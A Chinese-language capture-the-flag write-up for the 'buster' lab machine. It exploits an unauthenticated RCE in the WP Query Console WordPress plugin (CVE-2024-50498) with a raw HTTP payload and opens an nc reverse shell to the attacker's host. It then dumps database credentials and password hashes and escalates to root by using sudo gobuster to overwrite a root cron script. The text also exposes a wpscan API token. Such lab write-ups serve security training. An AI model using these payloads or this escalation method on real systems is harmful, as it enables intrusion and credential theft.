50.buster
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# nmap -sCV 192.168.0.112
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 03:32 EST
Nmap scan report for 192.168.0.112
Host is up (0.00038s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: bammmmuwe
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 6.7.1
MAC Address: 08:00:27:5B:50:A1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
发现有wordPress服务,
2.2. 漏洞扫描
这里有一个坑。wpscan必须要指定使用 --plugins-detection aggressive 模式才可以扫描出来。但是一般为了省时间都不会使用激进模式扫描。
┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# wpscan --url 192.168.0.112 --api-token NFNsfH98jCn9HY8bE9Xx6Z0opt1X9W15bqjgoMnpfFE -e u,ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.0.112/ [192.168.0.112]
[+] Started: Sat Feb 1 04:43:52 2025
...
[+] wp-query-console
| Location: http://192.168.0.112/wp-content/plugins/wp-query-console/
| Latest Version: 1.0 (up to date)
| Last Updated: 2018-03-16T16:03:00.000Z
| Readme: http://192.168.0.112/wp-content/plugins/wp-query-console/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.0.112/wp-content/plugins/wp-query-console/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
| References:
| - https://wpscan.com/vulnerability/f911568d-5f79-49b7-8ce4-fa0da3183214
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50498
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/ae07ca12-e827-43f9-8cbb-275b9abbd4c3
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.0.112/wp-content/plugins/wp-query-console/README.txt
可以发现网站安装 wp-query-console 插件,而且该插件有一个RCE 对应CVE-2024-50498
其实这里也可以使用 nuclei 进行扫描,一下就可以扫描出来了。
┌──(root㉿kali)-[~]
└─# nuclei -u 192.168.0.112
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.8
projectdiscovery.io
[WRN] Found 2 templates with runtime error (use -validate flag for further examination)
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 52
[INF] Templates loaded for current scan: 7654
[INF] Executing 7274 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 380 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Templates clustered: 1693 (Reduced 1591 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2024-50498] [http] [critical] http://192.168.0.112/index.php?rest_route=/wqc/v1/query
2.3. CVE-2024-50498利用
GitHub - RandomRobbieBF/CVE-2024-50498: WP Query Console <= 1.0 - Unauthenticated Remote Code Execution
网上有现成的Poc 直接用就行了
POST /wp-json/wqc/v1/query HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=wp-query-console
Content-Type: application/json
Content-Length: 45
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0
{"queryArgs":"phpinfo();","queryType":"post"}
尝试弹shell发现失败了
看一下phpinfo()
发现 system 函数被禁用了
我们直接使用 shell_exec() 函数执行命令即可
shell_exec('nc -e /bin/bash 192.168.0.114 2233');
成功获取到shell
┌──(root㉿kali)-[~/Desktop/hmv/buster]
└─# pwncat-cs -lp 2233
[06:54:55] Welcome to pwncat 🐈! __main__.py:164
[07:02:08] received connection from 192.168.0.112:36100 bind.py:84
[07:02:09] 192.168.0.112:36100: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@listen:/var/www/html/wordpress$
(remote) www-data@listen:/var/www/html/wordpress$ whoami
www-data
(remote) www-data@listen:/var/www/html/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
3. 提权到welcome用户
3.1. 数据库利用
先看下wp-config的配置文件
里面获取到了数据库的用户名与密码
(remote) www-data@listen:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'll104567' );
/** Database password */
define( 'DB_PASSWORD', 'thehandsomeguy' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
利用账号密码获取数据库中的敏感信息
(remote) www-data@listen:/home$ mysql -ull104567 -pthehandsomeguy
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 129466
Server version: 10.3.39-MariaDB-0+deb10u2 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> showdatabse;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'showdatabse' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.000 sec)
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
| 1 | ta0 | $P$BDDc71nM67DbOVN/U50WFGII6EF6.r. | ta0 | 2814928906@qq.com | http://192.168.31.181 | 2025-01-08 03:10:43 | | 0 | ta0 |
| 2 | welcome | $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/ | welcome | 127.0.0.1@qq.com | | 2025-01-08 04:29:28 | 1736310568:$P$B2YbhlDVF1XWIurbL11Pfoasb./0tD. | 0 | welcome |
+----+------------+------------------------------------+---------------+-------------------+-----------------------+---------------------+-----------------------------------------------+-------------+--------------+
2 rows in set (0.000 sec)
3.2. hash爆破
获取到了两个用户对应的hash
ta0 $P$BDDc71nM67DbOVN/U50WFGII6EF6.r.
welcome $P$BtP9ZghJTwDfSn1gKKc.k3mq4Vo.Ko/
利用rockyou爆破可以爆破出 welcome 用户的密码 104567
利用密码连接上去拿userflag
welcome@listen:~$ cat user.txt
29e0f786e8c90b3ce82e00de0ec7e7d3
4. welcome提权root
4.1. gobuster提权
$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen:
(ALL) NOPASSWD: /usr/bin/gobuster
发现我当前用户可以使用root权限运行gobuster
利用pspy64我们发现靶机上存在一个定时任务 /opt/.test.sh。且执行的权限是root
这里思路就是利用gobuster进行文件写入替换掉定时任务即可
这里需要对gobuster的一些参数有一定的了解
我们主要就是利用 -o 参数进行输出然后替换掉定时任务
首要任务就是构造出输出的payload
我们知道gobuster扫描出有效的结果后可以使用-o进行输出结果到指定的文件夹当中
例如
welcome@listen:/tmp$ echo 'pspy64' >dir.txt
welcome@listen:/tmp$ gobuster -w dir.txt -u 192.168.0.114 -o result.txt
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.0.114/
[+] Threads : 10
[+] Wordlist : dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2025/02/02 06:35:49 Starting gobuster
=====================================================
/pspy64 (Status: 200)
=====================================================
2025/02/02 06:35:49 Finished
=====================================================
welcome@listen:/tmp$ cat result.txt
/pspy64 (Status: 200)
如上,我将pspy64写入到字典里面,然后扫描我kali 192.168.0.114 ,并将结果输出到 result.txt,这里我们查看 result.txt 可以看到里面写入的是 /pspy64 (Status: 200)
那么我们只要想办法把 /pspy64 (Status: 200) 换成payload然后替换定时任务即可
这里需要注意结果不需要 /pspy64 (Status: 200) 中的 (Status: 200)
加上 -n 参数即可解决
然后我们把payload chmod +s /bin/bash 写入到dir.txt
靶机上操作
echo 'bin/chmod +s /bin/bash' >dir.txt
写入后还得保证能够扫描到这个文件,在被扫描的主机上创建对应的路径文件
被扫描的主机上操作
┌──(root㉿kali)-[/var/www/html]
└─# mkdir bin
┌──(root㉿kali)-[/var/www/html]
└─# cd bin
┌──(root㉿kali)-[/var/www/html/bin]
└─# mkdir "chmod +s "
┌──(root㉿kali)-[/var/www/html/bin]
└─# cd chmod\ +s\
┌──(root㉿kali)-[/var/www/html/bin/chmod +s ]
└─# mkdir bin
┌──(root㉿kali)-[/var/www/html/bin/chmod +s ]
└─# cd bin
┌──(root㉿kali)-[/var/…/html/bin/chmod +s /bin]
└─# touch bash
这里需要先创建一个bin目录 而不能直接创建chmod目录
因为gobuster输出的结果会给你加上/导致 最后的paylaod是/chmod +s /bin/bash从而无法执行
所以需要使用绝对路径/bin/chmod +s /bin/bash来构造payload
然后回到靶机上执行 Gobuster 并替换掉定时任务
welcome@listen:/tmp$ sudo gobuster -w dir.txt -u 192.168.0.114 -o /opt/.test.sh -n
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.0.114/
[+] Threads : 10
[+] Wordlist : dir.txt
[+] Status codes : 200,204,301,302,307,403
[+] No status : true
[+] Timeout : 10s
=====================================================
2025/02/02 07:01:39 Starting gobuster
=====================================================
/bin/chmod +s /bin/bash
=====================================================
2025/02/02 07:01:39 Finished
=====================================================
等待一会即可提权到root
welcome@listen:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
welcome@listen:/tmp$ /bin/bash -p
bash-5.0# id
uid=1001(welcome) gid=1001(welcome) euid=0(root) egid=0(root) groups=0(root),1001(welcome)
bash-5.0# cd /root
bash-5.0# ls
note.txt R00t_fl4g_is_HHHHerererererrererere.txt
bash-5.0# cat R00t_fl4g_is_HHHHerererererrererere.txt
b6a1a0de4223ba038327fc9c647701fb